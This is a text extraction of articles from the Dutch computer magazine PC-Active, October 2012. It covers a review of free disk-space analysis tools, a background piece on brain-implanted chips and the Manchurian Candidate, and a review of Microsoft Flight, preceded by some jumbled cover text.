26
Cybermaffia geanalyseerd
Tussen neuraal en digi taal
86
SANDBERG USB 3 Hard Disk Cloner
HD -TRUKENDOOS
SNEL KLONEN ZONDER
PC
Bèta
W NIUEU MET ! N INKS L INFO
INFOLINK 262262
Voor software en extra's bij de artikelen in dit blad
WWW.PC-ACTIVE .NL
60
LOMOND EVOJET OFFICE 60 pagina'
s per minuut 557 miljoen inktdruppe, ls per seconde!
€ 6,99
GEODATA 2 | HD ANALYSE TOOLS | GRAFISCHE TABL ET | ANTIVIRUS SPIONEE RT
Gedetailleerder voorspe llen
NR. 262 | OKT. 2012
USB 3 HD CLONER |
EURO VS. GULDEN
Wilders krijgt rekenles je
X 11
TREENOIPS SURIVITNA
artikelen in dit blad Voor software en extra's bij
de INFOLINK 262262
S HT EC SL
,5 42
OR VO
€
0
PCA-EW 262.indd 21
per seconde! 557 miljoen inktdruppe 60 pagina's per minuut ls ,
EVOJET OFFICE
2102 .TKO | 262 .RN
Cover.indd 1
9/6/12 5:11 PM
Profiteer van de korting en neem een jaarabonnement PC-Active (11 nummers) voor slechts € 42,50
Ga voor dit aanbod naar pc-active.nl/abonneren 9/6/12 5:13 PM
WAAR IS AL DIE VRIJE RUIMTE GEBLEVEN?
HANDIGE FREEWARE TEKST : DAVID BOELEE
Een volle harddisk; het overkomt ons allemaal. Soms is het dan niet meteen duidelijk waar alle vrije ruimte is gebleven. Dat maakt het moeilijker om weer plek te maken op de schijf. Gelukkig zijn er gratis tools die overzicht bieden.
H
et zal veel computergebruikers bekend in de oren klinken: de harddisk die bij aankoop een welhaast onuitputtelijke zee van ruimte leek te bieden, raakt toch nog onverwacht snel vol. Als dan niet meteen duidelijk is welke bestanden de meeste plek innemen op de schijf, kan het vrijmaken van de nodige ruimte een tijdrovende klus worden. Na het verwijderen van een paar directories die overduidelijk weg mogen, is vaak nog maar een fractie van de benodigde gigabytes gewonnen. De mogelijkheden van Windows zelf zijn voor zo’n klus eigenlijk niet toereikend. Het is mogelijk om
TreeSize Free
22
Freeware.indd 22
INFOLINK: SOFTWARE
voor iedere map te bekijken wat de omvang is van de bestanden die deze bevat - door er rechts op te klikken en dan de mapeigenschappen op te vragen - maar dat is tijdrovend en omslachtig. Als we gebruikmaken van wat extra software, kunnen we veel eenvoudiger en sneller inzicht krijgen in de omvang van de afzonderlijke mappen. We bekeken vier gratis tools die speciaal voor dit klusje zijn bedoeld.
TreeSize Free TreeSize Free is een eenvoudige, maar krachtige tool. Het analyseren van een harddisk met bijna 150 gigabyte aan data blijkt zo gebeurd, waarna het overzicht van de omvang van alle mappen op de schijf keurig op het scherm wordt gepresenteerd. We hebben de keuze om de omvang van de mappen te laten zien in kilobytes, megabytes of gigabytes dan wel weer te geven als een percentage van de totale omvang van de harddisk. Ook handig is dat we kunnen kiezen tussen het weergeven van de werkelijke bestandsomvang en de ruimte die op de harddisk is toegewezen. Doordat het bestandssysteem werkt met clusters van sectoren, is er vaak iets meer ruimte toegewezen aan een bestand dan de werkelijke omvang van de data. Met name voor NTFS-systemen en schijven met voornamelijk grote bestanden is dit verschil overigens minimaal. Voor het gemak kunnen we met een druk op de knop ook bekijken hoeveel ruimte de bestanden zouden innemen op een dvd of cd-rom. TreeSize Free is een eenvoudig programma, maar biedt precies de mogelijkheden die u van een dergelijke tool mag verwachten. Bovendien gaat de analyse van een harddisk verbluffend snel. Dat alles maakt het een uitstekende tool om meer inzicht te krijgen
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:09 AM
Freeware
| SOFTWARE
Space Sniffer
in de omvang van de verschillende directories op de harddisk. Overigens gaat het om een uitgeklede versie van een uitgebreidere tool. Wie betaalt krijgt nog veel meer opties, maar het is maar de vraag of u die werkelijk nodig hebt. Gelukkig is de freeware-versie ook echt gratis te gebruiken.
Space Sniffer Bij het weergeven van het ruimtegebruik van afzonderlijke mappen beperkt Space Sniffer zich tot een grafische representatie. Dat heeft voor- en nadelen. Het voordeel is dat het met een grafisch overzicht letterlijk makkelijk zichtbaar is waar de grootste blokken data zich bevinden. Bij een opruimactie zijn dat natuurlijk de mappen waar we de meeste ruimtewinst kunnen boeken. Het nadeel is in het geval van Space Sniffer dat de informatie die grafisch wordt weergegeven, enigszins beperkt is. Gedetailleerde gegevens over de afzonderlijke bestanden ontbreken: die blijven beperkt tot de bestandsnaam en de omvang in megabytes. Het navigeren door de verschillende mappen gaat met Space Sniffer zo gemakkelijk, dat we de tekstuele weergave van alle bestanden en mappen bijna niet misten. Soms is het echter niet meteen duidelijk waar een bepaald bestand zich bevindt en in die gevallen was wat extra informatie zeker welkom geweest. Space Sniffer geeft alle directories weer als rechthoeken en we kunnen afzonderlijke directories aanklikken, waarna meteen duidelijk is welke bestanden of mappen daar allemaal in zijn opgeborgen. We kunnen eenvoudig door de mappen navigeren en zo snel de grootste bestanden of omvangrijkste mappen opsporen. Een bijkomend voordeel van Space Sniffer is dat het programma is uitgevoerd als stand alone en dus geen installatie vereist. Zo blijft het systeem zelf schoon.
Scanner Scanner geeft een soort taartdiagram weer met daarop in aparte kleuren de verschillende directories. Hoe groter de weergave, des te meer ruimte de directory op de schijf inneemt. Daar houdt de functionaliteit van Scanner alweer op. Dat maakt het programma geschikt voor een snelle blik op de inhoud van de schijf, maar minder toepasbaar voor het diepgaandere uitzoekwerk. Prettig is dat het programma geen installatieprocedure vereist. Desgewenst kunnen we het wel via twee meegeleverde .reg files-opties toevoegen aan het contextmenu. De mogelijkheden van Scanner zijn beperkt, maar dankzij die laatste optie is het programma wel geschikt om tijdens het werken even snel een overzicht van de omvang van alle data in een map weer te geven.
Scanner
PC-ACTIVE | Nr. 262 – 2012
Freeware.indd 23
23
9/6/12 10:09 AM
SOFTWARE
| FREEWARE
WinDirStat
24
Freeware.indd 24
WinDirStat
Conclusie
WinDirStat is een Windows-versie van het Linuxprogramma KDirStat. De software is open source, wat natuurlijk prettig is voor degenen die graag precies weten wat ze op hun computer installeren. Na het starten vraagt WinDirStat ons welke harddisk we willen analyseren. Desgewenst kunnen we ervoor kiezen alle locale schijven of alleen een specifieke map te bekijken. De analyse was op onze testschijf binnen een aantal seconden gebeurd en de presentatie een lust voor het oog. Letterlijk, want naast de nodige cijfermatige informatie over de totale omvang van een map, het aantal bestanden in een map en het aantal mappen dat zich binnen de folder bevindt, krijgen we ook een grafische presentatie te zien van de inhoud van de harde schijf. Het blijkt allemaal erg prettig te werken. Doordat alle bestandstypen een andere kleur krijgen, is in één oogopslag te zien welk soort bestand de meeste ruimte inneemt. Bovendien is het ook gelijk zichtbaar waar zich de grootste bestanden bevinden en waar we de meeste ruimtewinst kunnen boeken. Wie graag controle heeft over het systeem, zal blij zijn te horen dat we na het selecteren van een directory direct een command prompt kunnen openen die wijst naar die map. WinDirStat combineert twee prettige eigenschappen: het pakket is open source en het is erg makkelijk in het gebruik. De Linux-wortels van het programma klinken door in zowel het uiterlijk als de opties en dat is wat deze reviewer betreft een positief punt. De datavisualisatie maakt het nog makkelijker om de inhoud van de harddisk in kaart te brengen; het programma doet het meeste werk al voor u.
Over de prestaties van alle programma’s in deze bespreking kunnen we kort zijn: ze verrasten ons stuk voor stuk met een bijzonder snelle analyse van de afzonderlijke mappen op de harde schijf. De functionaliteit van de bovenstaande software mag dan beperkt zijn, ze kunnen bij het opruimen van de harddisk goed van pas komen en veel tijdwinst opleveren. Ook in het dagelijks gebruik kan het handig zijn om goed zicht te houden op de omvang van data in een specifieke directory. Voor dat laatste is Scanner wellicht een goede keuze. Met dit programma kunnen we een snelle blik werpen op de inhoud van een directory. Maar voor een wat uitgebreider overzicht kunt u beter kiezen voor een ander programma. TreeSize Free is een prima stukje software dat heel goed is te gebruiken, als u tenminste geen behoefte hebt aan een grafische weergave van de inhoud van uw harde schijf. Hebt u dat wel, dan is er de keuze tussen Space Sniffer en WinDirStat. De grafische weergave van Space Sniffer vonden we de mooiste en meest praktische in het gebruik. Daar staat tegenover dat WinDirStat ook informatie geeft in tekst en zo het beste van twee werelden combineert. Een echte favoriet van deze twee kunnen we niet aanwijzen; wat ons betreft is het een nek-aan-nekrace.
INFOLINK 262016
Voor de downloads bij dit artikel: http://www.pc-active.nl/262016
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:10 AM
Een chip in uw brein
the Manchurian Candidate in het echt tekst : henny van der pluijm
Ze bestaan al, mensen die rondlopen met een chip geïmplanteerd in hun hersenen. Tot nog toe gaat het alleen om medische toepassingen, maar ook minder prettige scenario’s zijn denkbaar. Wordt The Manchurian Candidate dan toch werkelijkheid?
H
et is een onderwerp dat stuit op ongeloof en anders zeker een rilling van afschuw veroorzaakt: het inbouwen van een chip in de menselijke hersenen. Maar er is slecht nieuws en er is goed nieuws rondom dit thema. Het slechte nieuws is dat zelfs de engste fantasieën over een chip onder de hersenpan in de toekomst
26
mogelijk zullen zijn. Het goede nieuws is dat dit de gebruikelijke ‘glas is halfleeg’-benadering is, die wel vaker bij een ontluikende nieuwe technologie de boventoon voert, althans in het begin. Een chip in het brein - iets preciezer gezegd: een digitaal apparaat dat werkt op basis van halfgeleiders en met uw hersenen samenwerkt - kan ons ook erg veel plezier geven.
PC-ACTIVE | Nr. 262 – 2012
Chip-in-je-brein.indd 26
9/6/12 10:17 AM
Breinchip
DARPA De basis van deze technologie is de vaststelling dat de werking van de menselijke hersenen is gebaseerd op elektrische signalen. Die ontdekking stamt al van voor de Tweede Wereldoorlog, maar sinds de jaren zeventig wordt er serieus onderzoek gedaan naar deze brein-computerkoppelingen, aanvankelijk vrijwel uitsluitend gefinancierd door het Amerikaanse Defense Advanced Research Projects Agency (DARPA), het onderzoeksinstituut van het Pentagon dat ook aan de basis stond van het internet. Onderzoek naar de manieren waarop ons brein aan digitale apparaatjes kan worden gekoppeld, vindt nu aan tientallen universiteiten en technische instellingen plaats. De basis is dat de menselijke neurale systemen direct samenwerken met logische schakelingen op computerchips. Vooral sinds de jaren negentig zijn er concrete toepassingen uit voortgekomen. Vooral de medische wereld is een gewild toepassingsterrein voor de brein-machinekoppelingen. Het gaat dan vaak om het aanwenden van zogenoemde neuroprotheses, die zijn bedoeld voor bijvoorbeeld het tegengaan van de effecten van motorische uitval of voor sensorische vervanging. Bij motorische uitval gaat het om mensen met spierverlammingen die een prothese krijgen ingebouwd, die ervoor zorgt dat de patiënten zich op de één of andere manier weer zelfstandig in de wereld kunnen redden. Bij de patiënt wordt dan onder de schedel een chip geïmplanteerd die indirect in verbinding staat met een robotarm. De chip is een sensor die ongeveer de omvang heeft van een huis-tuin-en-keukenaspirine. Hij is ontworpen om de elektrische activiteit van een paar dozijn hersencellen te registreren, die normaal gesproken verantwoordelijk zijn voor het bewegen van een arm. Zo ontwikkelde de Universiteit van Boston een systeem waarmee een jongeman die door een auto-ongeluk helemaal was verlamd, door aan bepaalde woorden te denken klanken kon opwekken via een synthesizer. In de gebruikte software zijn relaties aangelegd tussen de activiteit in de hersenen en de bewegingen van de kaak en de mond. Als de sensoren die met zijn hersenpan zijn verbonden, een bepaalde activiteit registreren, wordt deze automatisch vertaald naar een klank die door een synthesizer wordt aangemaakt.
Signaal afgeven Bij een andere toepassing kreeg een patiënt de beschikking over een robotarm die de lichaamsfunctie van zijn eigen arm had overgenomen. Bij gezonde mensen beweegt de arm als de hersencellen een signaal afgeven. Bij de verlamde patiënt met de prothese detecteert de sensor het elektrische signaal dat uit de bewuste hersencellen komt en zendt hij vervolgens een eigen digitaal signaal door naar een computer. Die vertaalt het signaal van de chip in een opdracht aan de robotarm, die vervolgens begint te bewegen.
| Achtergrond
Een andere belangrijke groep toepassingen is gericht op zogenoemde sensorische vervanging. Hierbij gaat het om protheses voor patiënten bij wie een zintuig is uitgevallen, zoals zicht of gehoor, of die niet meer kunnen spreken. De brein-machinekoppeling is dan bedoeld om het uitvallen van hersenfuncties te compenseren die hebben te maken met het aansturen van de zintuigen. Maar het kan nog geavanceerder. Zo ontwierpen onderzoekers van de University of Southern California een neurochip die moet kunnen functioneren als een kunstmatige hippocampus. Dit uitermate belangrijke deel van de hersenen is verantwoordelijk voor het coderen van waarnemingen en ervaringen in hapklare brokken, op zodanige wijze dat ze kunnen worden opgeslagen in het langetermijngeheugen. Eigenlijk staat de hippocampus aan de basis van ons geheugen doordat het de schakel vormt tussen het korte- en het langetermijngeheugen. De chip zou op den duur een
De chip heeft de omvang van een simpele aspirine oplossing kunnen zijn voor patiënten die kampen met stoornissen in het langetermijngeheugen, zoals die worden veroorzaakt door de ziekte van Alzheimer. We begrijpen de werking van de hersenen ook op het niveau van de cel steeds beter. Daarom kon een aantal tot de verbeelding sprekende experimenten worden uitgevoerd waarbij hersenweefsel van mensen of dieren als basismateriaal werd gebruikt om systemen te bouwen voor de aansturing van machines. In 2004 voerde onderzoeker Thomas DeMarse van de Universiteit van Florida een experiment uit, dat was bedoeld om meer inzicht te krijgen in de manier waarop het brein van een gevechtspiloot een hypermodern vliegtuig bestuurt. Daarbij maakte hij gebruik van een plakje hersenweefsel dat was afgesneden van een rattenbrein. Het plakje bevatte volgens de onderzoeker een netwerk van 25 duizend neuronen, hersencellen die elektrische signalen doorlaten. Het stukje hersenweefsel werd op kweek gezet en begon zich spontaan te organiseren tot een neuraal netwerk rondom een raster van zestig elektroden die waren verbonden met een computer. Het netwerk werd vervolgens door elektrische signalen gestimuleerd en de onderzoeker kreeg het voor elkaar dat de hersencellen in een simulatie een hypermodern F22 Raptor-vliegtuig wisten te besturen. Met het neurale netwerk werd een aantal veelvoorkomende manoeuvres gesimuleerd.
Gedachtengolven Het onderzoek van DeMarse toonde aan dat voor het bouwen van een werkende toepassing alleen het her-
PC-ACTIVE | Nr. 262 – 2012
Chip-in-je-brein.indd 27
27
9/6/12 10:17 AM
Achtergrond
| Breinchip
senweefsel en een digitaal machientje nodig waren. De rat die de eigenaar van de hersencellen was, was niet bij het experiment betrokken. Brein-machine-interfaces leiden volgens sommige waarnemers al binnen afzienbare tijd tot concrete, alledaagse toepassingen. Zo is het goed denkbaar dat de koppelingen er al over enkele jaren toe leiden dat we niet meer de traditionele invoerinstrumenten voor computers en andere digitale apparaten nodig hebben. Dat wordt althans de toekomst als we chipfabrikant Intel moeten geloven, die stelt dat we al in 2020 geen toetsenbord en muis meer nodig zullen hebben om een computer te bedienen. Dat zal dan gebeuren via gedachtengolven. Ook deze techniek is gebaseerd op het gebruik van digitale sensoren die in de menselijke hersenen worden geïmplanteerd. Het principe is heel simpel. Stel, u wilt een artikel gaan tikken. U denkt: “Open Word”, en de tekstverwerker wordt op uw scherm geactiveerd. U denkt: “PC-Active, chip in uw brein” en de woorden verschijnen op het scherm, net zo makkelijk. Vooralsnog is dit toekomstmuziek, maar aan de Universiteit van Pittsburgh wordt serieus aan dergelijke toepassingen gewerkt. De truc is uiteraard om een verband te kunnen leggen tussen de gedachten in onze hersenen en de activiteit in het brein die daarbij wordt gemeten. Dat gebeurt via een geavanceerd type Magnetic Resonance Imaging- of MRI-scanner, een apparaat dat tegenwoordig
in de meeste ziekenhuizen wordt gebruikt. Met de techniek van Functional Magnetic Resonance Imaging worden veranderingen in de bloedsomloop van de hersenen vastgesteld, die vervolgens tijdens experimenten worden gerelateerd aan een woord of beeld waar de proefpersonen aan denken. Deze technologie is overigens nog sterk experimenteel. Net als met andere medische toepassingen is er natuurlijk weinig mis met dergelijke brein-machineinterfaces, net zo min als het aansturen van computers of smartphones via gedachtengolven iets kwaadaardigs heeft. Een brein-machine-interface zoals aan de Universiteit van Pittsburgh wordt ontwikkeld, zou bijvoorbeeld ook het startpunt kunnen worden voor het ontwikkelen van een digitaal geheugen dat aan onze hersenen wordt gekoppeld en als back-up dient voor alle gedachten die we hebben. Het menselijk geheugen laat nogal eens te wensen over en op die manier hoeven we nooit meer iets te vergeten.
Moordaanslag Kan het ook andersom? Dat signalen van buitenaf de werking van de hersenen beïnvloeden? Zou het kunnen dat een speciaal type brain machine interface ooit een Manchurian Candidate (zie kader) gaat opleveren, een persoon die vroeg of laat een moordaanslag gaat plegen zonder dat hij er zelf invloed op heeft? De vraag stellen is hem beantwoorden. Want als elektrische signalen in de hersenen kunnen worden afge-
The Manchurian Candidate In 1959 publiceert de voormalige Amerikaanse reclameman Richard Condon de roman The Manchurian Candidate. Het verhaal gaat over Raymond Shaw, een telg uit een invloedrijke familie die tijdens de oorlog in Korea (1950-1953) wordt gevangengenomen door de vijand. De Chinese en Russische communisten stonden tijdens dit conflict aan de kant van de Noord-Koreanen, die vochten tegen de door de Amerikanen gesteunde Zuid-Koreanen. Shaw wordt tijdens zijn gevangenschap door de communisten gehersenspoeld. Teruggekomen op Amerikaanse bodem kan de militair zich daarvan niets meer herinneren. Als hij echter een speelkaart met een ruitenvrouw onder ogen krijgt, verandert hij in een willoze moordenaar die opdracht krijgt een presidentskandidaat te vermoorden. Deze plot is minder vergezocht dan het lijkt. Tijdens de Koreaanse oorlog werden Amerikaanse krijgsgevangenen gedwongen tot onware ‘bekentenissen’ over het gebruik van biologische wapens door hun land. Hun Chinese ondervragers maakten gebruik van bedreigingen met de dood, vernederingen en slaaponthouding. Aan het begin van de oorlog introduceerde Edward Hunter, een Amerikaanse journalist met vooruitziende blik, het woord brainwashing, hersenspoeling. Zelf spraken de Chinezen van ‘gedachtehervorming’, die ze vooral binnenslands toepasten op dissidenten. In 1962 verfilmt regisseur John Frankenheimer het boek van Condon. Zanger Frank Sinatra speelt de hoofdrol. De film wordt genomineerd voor twee Oscars en krijgt juichende besprekingen. Zo schrijft critica Pauline Kael: “Dit is mogelijk de meest ingenieuze politieke satire die ooit in Hollywood is gemaakt.” De productie is mede bekend door een gerucht. Toen president Kennedy in 1963 werd vermoord, zou zijn vriend Sinatra The Manchurian Candidate uit de roulatie hebben laten nemen. Onzin, zegt Michael Schlesinger, die de film opnieuw uitbracht in 1988. Eind 1963 had iedereen die dat wilde de film eenvoudigweg gezien. Jaap de Wreede
28
PC-ACTIVE | Nr. 262 – 2012
Chip-in-je-brein.indd 28
9/6/12 10:17 AM
BREINCHIP
vangen door een chip, kunnen ze daar ook kunstmatig door een chip worden opgewekt. In de Verenigde Staten voerde de omstreden onderzoeker José Delgado in de jaren zestig al experimenten uit met een zogenoemde transdermal stimulator. Dat was een klein elektronisch apparaatje dat in het brein van mensen en dieren werd geïmplanteerd en dat elektrische signalen direct naar de hersenen leidde. De uitkomsten van de experimenten waren soms verbluffend. Zo werd een stier met een rode lap geprovoceerd om een mens aan te vallen, waarna het beest met een druk op de knop transformeerde in een mak veulen dat op zijn gemak wegbanjerde. Bij latere experimenten in de jaren zeventig koppelde Delgado de chip aan een computer en stelde hij vast dat de hersenen niet alleen door deze machine konden worden aangestuurd, maar dat de relevante hersenactiviteit ook kon worden geregistreerd en vastgelegd. Hoewel Delgado ook experimenten op mensen heeft uitgevoerd, zijn deze nooit goed gedocumenteerd. Het is echter niet moeilijk voor te stellen dat ook mensen door externe stimulering van de emotionele centra tot handelingen kunnen worden aangezet die ze zonder de invloed daarvan niet zouden verrichten. Chemische stoffen zoals alcohol en drugs zijn gemakkelijk in staat het emotionele systeem te beïnvloeden. Directe stimulering van de bewuste emotionele centra door
| ACHTERGROND
elektrische signalen zou hetzelfde resultaat kunnen hebben. De huidige experimenten met het ‘uitlezen’ van gedachten door het opvangen van elektrische signalen uit de hersencellen en door het vastleggen van de bloedstroom, maken de weg vrij voor de volgende stap. Want mensen iets laten doen wat ze zelf niet hebben bedacht, is één ding, ze er de verantwoordelijkheid voor laten nemen, gaat nog een stap verder. Als het onderzoek, zoals dat wordt gedaan aan de Universiteit van Pittsburgh, zo ver is gevorderd dat er ondubbelzinnige relaties zijn vastgesteld tussen bepaalde hersenactiviteit en bepaalde gedachten, is het niet moeilijk voor te stellen dat de gedachten zelf door externe stimuli worden opgewekt. Dan wordt het mogelijk om bij mensen niet alleen emoties, maar ook gedachten kunstmatig op te wekken. Dan kan een Manchurian Candidate niet alleen tot moord worden aangezet, maar heeft hij er zelf ook nog een verklaring voor.
INFOLINK 262001
Voor meer informatie: http://www.pc-active.nl/262001
PC-ACTIVE | Nr. 262 – 2012
Chip-in-je-brein.indd 29
29
9/6/12 10:18 AM
Bijna gratis virtueel vliegen
Microsoft Flight tekst : toine k amphuis
Maar liefst tien versies verschenen er van Microsoft Flight Simulator. Maar sinds 2006 is het stil aan het vliegfront. Microsoft Flight Simulator X (FSX) was de laatste uitgave en de studio werd opgeheven. Einde verhaal? Nee, opeens verscheen Flight, een - bijna gratis instapsimulatie.
V
an de allereerste versies met blokkerige graphics tot de tiende uitgave uit 2006, de gemiddelde desktoppiloot genoot de a fgelopen dertig jaar met volle teugen van Microsoft Flight Simulator, het modulair uitbreidbare platform dat vrijwel de hele wereld simuleerde. Lekker ontspannen eilandhoppen met een Cessna op de Caraïben of levensechte lijnvluchten nabootsen en met een 737 grote vliegvelden in Europese steden a andoen: u bepaalt zelf hoe realistisch u vliegt. Dat is - pardon was - de charme van de Flight Simulator-reeks. Met deze serie verzorgde Microsoft de basis. Voor de echt fanatieke vliegers waren er tal van third party ontwikkelaars die de mooiste uitbreidingspakketten op de markt brachten. Ook was er een levendige online gemeenschap die eindeloos sleutelde aan freeware-toevoegingen. Een gouden formule. Alleen niet voor Microsoft.
Opgeschort Met name de afgelopen zes jaar moest de softwarereus lijdzaam toezien hoe er miljoenen werden verdiend door derden die uitbreidingen ontwikkelden voor FSX. Microsoft liep de pecunia mis en besloot vrij rigoureus - alle flightsim-gerelateerde activiteiten op te schorten. Sindsdien vloog de community gewoon door met FSX. Deze laatst verschenen sim is behoorlijk gedateerd, maar dankzij de inspanningen van zowel
30
MS Flight.indd 30
commerciële als doe-het-zelf ontwikkelaars is FSX nog steeds een razend populaire flightsim. Sinds een halfjaar is Microsoft ‘opeens’ weer back in business met Flight, een nieuwe vliegsimulatie die in eerste instantie is bedoeld om mensen kennis te laten maken met virtueel vliegen. Het vrijblijvende karakter van deze comeback schuilt in het gratis downloaden en onbeperkt kunnen vliegen. Maar dan wel met restricties. Zo bevat Flight slechts een deel van Hawaï. De rest van de wereld is buiten bereik. En ja, u voelt het al aankomen: voor extra gebieden (scenery) mag u de portemonnee trekken. Hetzelfde geldt voor extra vliegtuigen. In Flight kunt u vliegen met een handjevol kisten bestaande uit een Boeing Stearman dubbeldekker en een Icon A5 ultralicht toestel. Een Boeing 737 en een Airbus A320 zijn afwezig vanwege de doodeenvoudige reden dat u de eilandengroep niet kunt - lees: mag! - verlaten. Nu is deze auteur een redelijk fanatiek flightsimmer - met een heuse zelfbouwcockpit thuis - en u begrijpt de teleurstelling. Van een modulair platform met alle toeters en bellen overschakelen naar een sterk gelimiteerde simulatie, dat is een stevige stap terug. Maar goed, de marketingmensen van Microsoft willen graag geld verdienen en dan is dit blijkbaar dé manier. Ondertussen is Flight keihard afgeserveerd door de fanatieke flightsim-gemeenschap. Tegelijkertijd zorgt de nieuwe versie er wel weer voor dat een brede doelgroep kan kennismaken met deze hobby.
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:22 AM
Microsoft Flight
Speels Belangrijkste vraag is: wat kunt u wél met Microsoft Flight? Na de eenvoudige installatie via de Live-service komt u in een overzichtelijk menu terecht. Hierin kunt u rechtstreeks naar de hangar gaan en een vliegtuig selecteren voor uw eerste vlucht. Of u kiest ervoor om enkele challenges of missions uit te voeren. Hierbij maakt u op speelse wijze kennis met vliegen. Sterker nog, u leert in korte tijd hoe u de toestellen in de lucht krijgt en veilig weer aan de grond zet. Grappig genoeg is het speelse karakter, ook voor deze hardcore vlieger, niet heel erg storend. Natuurlijk, het realisme is soms ver te zoeken als u onder tijdsdruk door grote groene cirkels in de lucht moet vliegen of met ware doodsverachting onder bruggen door moet jakkeren. Deze escapades zijn nodig om meer ervaringspunten te verzamelen. Klinkt misschien wat kinderlijk, maar toch is de verslavingsfactor prominent aanwezig. Ook voor de serieus ingestelde simmer. Zo heeft Flight een beloningssysteem waarbij bepaalde missies alleen beschikbaar komen als u een bepaald ervaringslevel behaalt. Net als bij een role playing game komt u al doende verder.
Schitterende graphics Gelukkig is er ook nog de Free Flight-modus, waarin u in alle rust van een vliegveld naar keuze opstijgt om te genieten van de schitterende omgeving. Op het vlak van de visuele weergave is goed te zien dat de
| SOFTWARE
oude - bijna antieke - software engine van FSX stevig is opgepoetst en geoptimaliseerd. Meest in het oog springend is het dynamische licht- en schaduwsys teem met real time reflecties. Dankzij high dynamic range graphics krijgt alles ook nog eens veel meer diepte. Bovendien, bij het zwaar bejaarde FSX is er veel sprake van popping en clipping, waarbij het landschap in de verte stapsgewijs in beeld verschijnt, inclusief de nodige stotteringen. Flight daarentegen presenteert de omgeving supervloeiend. Zelfs op een niet-geoptimaliseerde computer – in dit geval een eenvoudige desktop-pc met Core i5 processor en een nVidia 560-videokaart - draait Flight goed en zijn de graphics schitterend. Aanvankelijk is de gratis basisinstallatie van Flight beperkt tot een klein gebied waarin u kunt vliegen met een beperkt aantal vliegtuigen. Als u de smaak te pakken krijgt, dan is er de mogelijkheid om alle eilanden te kopen in het Hawaiian Adventure Pack. Dit pakket kost 1200 Microsoft-punten, omgerekend een euro of veertien. Bij deze add-on krijgt u ook een extra toestel, de Vans RV-6A; dat is een tweezitter propellertoestel. Voor nog een slordige tien euro kunt u de Maule M-7-260C op de Microsoft-marktplaats aanschaffen. Dit toestel is wat groter en is bij uitstek geschikt om vracht mee te vervoeren tussen de verschillende eilanden. Het betreft hier een zogenoemde luxe uitvoering, oftewel een toestel dat is voorzien van een gedetailleerd exterieur én een volledige interactieve cockpit. Dit in tegenstelling tot andere goedkope of gratis toestellen op de marktplaats, die alleen maar een exterieur hebben. Als u plaatsneemt in de virtuele cockpit van zo’n toestel, dan ziet u alleen de wereld om u heen. Alsof u in het luchtledige vliegt. Met de nieuwe scenery en vliegtuigen worden tal van nieuwe missies en uitdagingen mogelijk. Helaas is het aanbod een beetje eentonig. Van rondvluchten met toeristen tot het vervoeren van ladingen van punt A naar punt B en een sporadische zoekactie naar vermiste personen, echt verheffend is het allemaal niet. Hetzelfde geldt ook voor de vliegtuigen die u in Flight kunt besturen. De luxe toestellen zijn netjes afgewerkt, maar op tal van punten is de interactieve functionaliteit gestript. Met een druk op de knop zet u de motor aan en met vol gas hebt u een kist bin-
FSX versus Flight FSX is zes jaar oud, maar wordt kunstmatig in leven gehouden met tal van uitbreidingen. Van add-on vliegtuigen tot scenery (vliegvelden, steden, complete fotorealistische gebieden et cetera), weerprogramma’s en applicaties om hoge resolutie textures te verbeteren: met het installeren van een tiental uitbreidingen kan FSX makkelijk de concurrentie aan met Flight. Sterker nog, FSX biedt de mogelijkheid om in de hele wereld ongelimiteerd te vliegen. Met de freeware scenery van NL-2000 kunt u zelfs over Nederland vliegen met fotorealistisch landschap. Flight is beperkt tot Hawaï en binnenkort Alaska.
PC-ACTIVE | Nr. 262 – 2012
MS Flight.indd 31
31
9/6/12 10:22 AM
MICROSOFT FLIGHT
nen tien seconden in de lucht. Zelfs op de zwaarste moeilijkheidsgraad is het een koud kunstje om rond te vliegen in Flight. Landen is daarentegen een ander verhaal. Ironisch genoeg is een vliegtuig besturen ‘in het echt’ ook niet zo heel moeilijk. Het is gewoon een kwestie van voldoende snelheid houden en subtiel sturen. Het zijn met name de variabelen die roet in het eten gooien, zoals wind, beperkt zicht, turbulentie enzovoort. Hoe eenvoudig de opzet van Flight ook is, het vliegmodel is wel redelijk realistisch. Tijdens het vliegen merkt u de invloeden van de wind en dankzij de schitterende graphics is het soms moeilijk om bij slecht weer te navigeren. Het is heel verleidelijk om te mopperen over de commerciële weg die Microsoft is ingeslagen. Flight nodigt uit om appels met peren te vergelijken. Ja, het is jammer dat het universele flightsimulator platform van weleer niet een vervolg krijgt en dat Flight volledig afgesloten is voor externe ontwikkelaars. Nu krijgt de consument een laagdrempelig, beperkt realistisch alternatief voorgeschoteld waarbij het winstoogmerk er vanaf druipt. De flightsimulator-gemeenschap schreeuwt moord en brand. Maar voor de mensen die iets minder fanatiek zijn en vrijblijvend willen kennismaken met flightsimmen, is Flight een uitkomst.
Toekomst van Flight? Die is er niet. Microsoft heeft onlangs de uitbreiding Alaska toegevoegd en slechts enkele weken later werd bekend dat de ontwikkelstudio is opgedoekt. Microsoft trekt de stekker eruit. Flight bleek niet in staat om een nieuwe groep consumenten te bereiken en hardcore flightsimmers bleven liever bij FSX. Hopelijk ziet het bedrijf nu het licht en kan gestart worden met een serieuze opvolger van FSX: een vliegspel en -simulatie ineen voor casual en hardcore
| SOFTWARE
virtuele vliegers. In de tussentijd is Flight wel degelijk een aangenaam, gratis tussendoortje voor mensen die vrijblijvend kennis willen maken met de virtuele vliegwereld. Hoe beperkt die ook is…
Conclusie Microsoft Flight is een prima manier om vrijblijvend kennis te maken met virtueel vliegen. Maar echt realistisch is het allemaal niet. De nadruk ligt op het speelse karakter en de uitbreidbaarheid tegen beta-
Tip Hebt u de smaak van het vliegen te pakken, haal dan ergens FSX uit de budgetbak, koop online enkele add-ons en vlieg de hele wereld over. U kunt het net zo makkelijk of moeilijk maken als u zelf wilt. Bijvoorbeeld: altijd al een ‘echte’ 737 willen besturen waarbij alles, maar dan ook echt alles tot in de puntjes is gesimuleerd? Ga naar www.precisionmanuals.com [1]. De 737 NGX is de meest realistische add-on voor FSX van dit moment. Liever in klassiekers rondvliegen? Ga naar www.a2asimulations.com [2] voor de vliegtuigen met Accusim. Deze staan garant voor een levensechte, accurate simulatie van klassieke toestellen.
ling. Van een vervolg in de originele Flightsimulatorreeks is geen sprake. Desalniettemin is Flight zeker vermakelijk. Ook voor hardcore flightsimmers. Het is niet een kwestie van ‘of’, maar van ‘en’. Nu maar hopen dat Microsoft ooit verder gaat met de echte Flightsim-reeks.
INFOLINK 262014
Voor voetnoten en meer informatie: http://www.pc-active.nl/262014
